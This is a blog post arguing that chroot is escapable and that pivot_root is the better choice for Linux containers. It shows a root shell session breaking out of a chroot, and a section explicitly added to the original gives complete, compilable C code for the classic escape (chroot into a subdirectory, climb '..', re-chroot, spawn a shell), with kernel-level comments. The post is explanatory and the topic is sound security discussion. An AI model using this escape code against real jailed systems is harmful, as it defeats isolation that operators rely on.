Sigh. It seems I’m (*1) being called out (*2) for advocating the use of pivot_root over chroot for containers.
Now first off, containers aren’t secure anyway, so this is all kind of moot. If the use of pivot_root over chroot is causing actual problems, we should reconsider. But I couldn’t find any mention of such problems in the post in question.
Nevertheless, chroot *is* escapable. It has nothing to do with ‘your / link not getting updated’. It has to do with the actual (dentry, vfsmount) pair the kernel keeps as the process's root. I’ll say no more and leave understanding the rest as an exercise for the reader. Of course, before bothering to look, you will want to convince yourself. So grab the source from http://www.bpfh.net/simes/computing/chroot-break.html. Set up another rootfs. I had one handy from a container, so I used /var/lib/lxc/natty/rootfs. I copied my executable, called escapechroot, to /var/lib/lxc/natty/rootfs/root. Then I did
root@peqn:/# cd /var/lib/lxc/natty/rootfs
root@peqn:/# chroot .
root@peqn:/# cd .
root@peqn:/# ls /var/lib/lxc/natty
ls: cannot access /var/lib/lxc/natty: No such file or directory
root@peqn:/# /root/escapechroot
# ls /var/lib/lxc/natty
config fstab rootfs
All right, so it *is* escapable. Now go read the kernel code.
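Here, as an added example that is not part of the original post and is not Simes' chroot-break.c, is a minimal C version of the same escape with the two kernel facts it relies on written into the comments: sys_chroot() only swaps fs->root (via set_fs_root()), leaving fs->pwd alone, and follow_dotdot() refuses to walk ".." above fs->root only when the current path *is* fs->root, which never happens once cwd sits outside the new root. The function names (climb_to_top, escape_chroot) and the scratch directory name are my own choices.

```c
/* chroot_escape.c: added example, not the post's own code nor chroot-break.c.
 * Build: gcc -Wall -o chroot_escape chroot_escape.c
 * Run as root *inside* the jail (chroot(2) needs CAP_SYS_CHROOT); as an
 * unprivileged user chroot() fails with EPERM and no escape happens. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Step up with chdir("..") until it stops moving us. Each chdir("..") is
 * resolved by the kernel's follow_dotdot(), which stops at the process's
 * root (fs->root). Returns the number of steps taken, or -1 on error or
 * if the tree is deeper than max_steps. */
int climb_to_top(int max_steps)
{
    struct stat before, after;
    for (int steps = 0; steps < max_steps; steps++) {
        if (stat(".", &before) < 0 || chdir("..") < 0 || stat(".", &after) < 0)
            return -1;
        if (before.st_dev == after.st_dev && before.st_ino == after.st_ino)
            return steps;           /* ".." was a no-op: top of the tree */
    }
    return -1;
}

/* The escape. scratch_dir is any directory name we are allowed to create
 * (hypothetical name, any will do). Returns 0 on success, -1 with errno set. */
int escape_chroot(const char *scratch_dir)
{
    if (mkdir(scratch_dir, 0755) < 0 && errno != EEXIST)
        return -1;
    /* chroot() replaces only fs->root, the (dentry, vfsmount) pair the
     * kernel uses as "/" for us. fs->pwd, our cwd, is left where it was,
     * which is now *outside* the new root. */
    if (chroot(scratch_dir) < 0)
        return -1;
    /* follow_dotdot() stops ".." only when the path being walked equals
     * fs->root. Our cwd is not under fs->root, so that check never fires
     * and ".." walks past the jail up to the real root of the mount tree. */
    if (climb_to_top(256) < 0)
        return -1;
    /* Make the real root our root again. */
    return chroot(".");
}

int main(void)
{
    if (escape_chroot("escape_scratch") < 0) {
        fprintf(stderr, "escape failed: %s\n", strerror(errno));
        return 1;
    }
    /* From this shell, ls /var/lib/lxc/natty now works as in the session above. */
    execl("/bin/sh", "sh", "-i", (char *)NULL);
    perror("execl");
    return 1;
}
```

Dropping CAP_SYS_CHROOT inside the jail makes the chroot() in step two fail and so blocks this particular sequence; it does not turn chroot into a security boundary, it only removes one of the ways of stepping over it.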
(*1) Rudely, with no private communication or chance to show I’m right or admit I’m wrong.
(*2) And being called an author of LXC, which I am not.